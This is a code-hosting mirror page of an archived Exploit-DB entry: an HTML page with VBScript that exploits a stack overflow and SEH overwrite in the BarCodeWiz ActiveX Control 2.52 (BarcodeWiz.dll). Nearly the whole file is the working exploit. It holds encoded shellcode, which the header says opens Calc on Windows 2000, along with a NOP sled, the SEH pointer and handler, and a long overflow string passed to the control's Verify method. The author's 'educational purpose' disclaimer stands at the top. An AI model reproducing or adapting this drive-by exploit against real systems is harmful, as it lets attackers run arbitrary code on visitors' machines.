bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/3882.html
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

68 lines
No EOL
2.7 KiB
HTML
Raw Blame History

<!--
===============================================================================================
BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll)Stack Overflow SEH Overwrite Exploit
By Parveen Vashishtha
==============================================================================================
Date : 09-05-2007
Open Calc on 2K
PS. This was written for educational purpose. Use it at your own risk.Author will be not be
responsible for any damage.
Thanks to Metasploit and Stroke
-->
<html>
<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6" > </OBJECT>
<script language="vbscript">
shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")
nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")
pointer_to_seh=unescape("%eb%06%90%90")
seh_handler=unescape("%a9%11%02%75")
targetFile = "C:\Program Files\BarCodeWiz ActiveX Demo\DLL\BarcodeWiz.dll"
prototype = "Function Verify ( ByVal Barcode As String ) As Boolean"
memberName = "Verify"
progid = "BARCODEWIZLib.BarCodeWiz"
argCount = 1
arg1=String(3256,"A")
arg1=arg1+pointer_to_seh+seh_handler+nop+shellcode+nop
target.Verify arg1
</script>
</body>
</html>
# milw0rm.com [2007-05-09]
Reference in a new issue View git blame Copy permalink